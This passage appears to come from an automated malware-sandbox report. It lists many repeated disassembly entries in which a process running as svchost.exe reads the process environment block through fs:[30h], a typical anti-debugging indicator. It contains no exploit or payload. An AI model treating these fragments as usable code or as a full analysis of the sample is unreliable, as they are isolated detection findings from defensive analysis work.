            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0344E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_034663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0342E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0345438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0350539D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0348739A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]8_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03428397 mov eax, dword ptr fs:[00000030h]8_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034533A5 mov eax, dword ptr fs:[00000030h]8_2_034533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034633A0 mov eax, dword ptr fs:[00000030h]8_2_034633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034633A0 mov eax, dword ptr fs:[00000030h]8_2_034633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429240 mov eax, dword ptr fs:[00000030h]8_2_03429240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429240 mov eax, dword ptr fs:[00000030h]8_2_03429240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346724D mov eax, dword ptr fs:[00000030h]8_2_0346724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A250 mov eax, dword ptr fs:[00000030h]8_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EB256 mov eax, dword ptr fs:[00000030h]8_2_034EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EB256 mov eax, dword ptr fs:[00000030h]8_2_034EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436259 mov eax, dword ptr fs:[00000030h]8_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03434260 mov eax, dword ptr fs:[00000030h]8_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FD26B mov eax, dword ptr fs:[00000030h]8_2_034FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034FD26B mov eax, dword ptr fs:[00000030h]8_2_034FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342826B mov eax, dword ptr fs:[00000030h]8_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03459274 mov eax, dword ptr fs:[00000030h]8_2_03459274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03471270 mov eax, dword ptr fs:[00000030h]8_2_03471270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03471270 mov eax, dword ptr fs:[00000030h]8_2_03471270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E0274 mov eax, dword ptr fs:[00000030h]8_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03467208 mov eax, dword ptr fs:[00000030h]8_2_03467208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03467208 mov eax, dword ptr fs:[00000030h]8_2_03467208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505227 mov eax, dword ptr fs:[00000030h]8_2_03505227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342823B mov eax, dword ptr fs:[00000030h]8_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0343A2C3 mov eax, dword ptr fs:[00000030h]8_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B2C0 mov eax, dword ptr fs:[00000030h]8_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034392C5 mov eax, dword ptr fs:[00000030h]8_2_034392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034392C5 mov eax, dword ptr fs:[00000030h]8_2_034392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B2D3 mov eax, dword ptr fs:[00000030h]8_2_0342B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345F2D0 mov eax, dword ptr fs:[00000030h]8_2_0345F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345F2D0 mov eax, dword ptr fs:[00000030h]8_2_0345F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E12ED mov eax, dword ptr fs:[00000030h]8_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034402E1 mov eax, dword ptr fs:[00000030h]8_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035052E2 mov eax, dword ptr fs:[00000030h]8_2_035052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EF2F8 mov eax, dword ptr fs:[00000030h]8_2_034EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034292FF mov eax, dword ptr fs:[00000030h]8_2_034292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346E284 mov eax, dword ptr fs:[00000030h]8_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346E284 mov eax, dword ptr fs:[00000030h]8_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B0283 mov eax, dword ptr fs:[00000030h]8_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505283 mov eax, dword ptr fs:[00000030h]8_2_03505283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346329E mov eax, dword ptr fs:[00000030h]8_2_0346329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346329E mov eax, dword ptr fs:[00000030h]8_2_0346329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034452A0 mov eax, dword ptr fs:[00000030h]8_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F92A6 mov eax, dword ptr fs:[00000030h]8_2_034F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov ecx, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C62A0 mov eax, dword ptr fs:[00000030h]8_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C72A0 mov eax, dword ptr fs:[00000030h]8_2_034C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C72A0 mov eax, dword ptr fs:[00000030h]8_2_034C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov eax, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov eax, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov ecx, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B92BC mov ecx, dword ptr fs:[00000030h]8_2_034B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505152 mov eax, dword ptr fs:[00000030h]8_2_03505152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov ecx, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C4144 mov eax, dword ptr fs:[00000030h]8_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03429148 mov eax, dword ptr fs:[00000030h]8_2_03429148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03437152 mov eax, dword ptr fs:[00000030h]8_2_03437152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C156 mov eax, dword ptr fs:[00000030h]8_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436154 mov eax, dword ptr fs:[00000030h]8_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03436154 mov eax, dword ptr fs:[00000030h]8_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342F172 mov eax, dword ptr fs:[00000030h]8_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034C9179 mov eax, dword ptr fs:[00000030h]8_2_034C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov ecx, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034DA118 mov eax, dword ptr fs:[00000030h]8_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F0115 mov eax, dword ptr fs:[00000030h]8_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03460124 mov eax, dword ptr fs:[00000030h]8_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03431131 mov eax, dword ptr fs:[00000030h]8_2_03431131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03431131 mov eax, dword ptr fs:[00000030h]8_2_03431131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342B136 mov eax, dword ptr fs:[00000030h]8_2_0342B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F61C3 mov eax, dword ptr fs:[00000030h]8_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F61C3 mov eax, dword ptr fs:[00000030h]8_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346D1D0 mov eax, dword ptr fs:[00000030h]8_2_0346D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0346D1D0 mov ecx, dword ptr fs:[00000030h]8_2_0346D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035051CB mov eax, dword ptr fs:[00000030h]8_2_035051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034551EF mov eax, dword ptr fs:[00000030h]8_2_034551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034351ED mov eax, dword ptr fs:[00000030h]8_2_034351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_035061E5 mov eax, dword ptr fs:[00000030h]8_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034601F8 mov eax, dword ptr fs:[00000030h]8_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03470185 mov eax, dword ptr fs:[00000030h]8_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EC188 mov eax, dword ptr fs:[00000030h]8_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034EC188 mov eax, dword ptr fs:[00000030h]8_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034B019F mov eax, dword ptr fs:[00000030h]8_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A197 mov eax, dword ptr fs:[00000030h]8_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03487190 mov eax, dword ptr fs:[00000030h]8_2_03487190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034E11A4 mov eax, dword ptr fs:[00000030h]8_2_034E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344B1B0 mov eax, dword ptr fs:[00000030h]8_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03432050 mov eax, dword ptr fs:[00000030h]8_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034D705E mov ebx, dword ptr fs:[00000030h]8_2_034D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034D705E mov eax, dword ptr fs:[00000030h]8_2_034D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345B052 mov eax, dword ptr fs:[00000030h]8_2_0345B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03505060 mov eax, dword ptr fs:[00000030h]8_2_03505060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov ecx, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03441070 mov eax, dword ptr fs:[00000030h]8_2_03441070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0345C073 mov eax, dword ptr fs:[00000030h]8_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034AD070 mov ecx, dword ptr fs:[00000030h]8_2_034AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0344E016 mov eax, dword ptr fs:[00000030h]8_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342A020 mov eax, dword ptr fs:[00000030h]8_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0342C020 mov eax, dword ptr fs:[00000030h]8_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034F903E mov eax, dword ptr fs:[00000030h]8_2_034F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034470C0 mov eax, dword ptr fs:[00000030h]8_2_034470C0
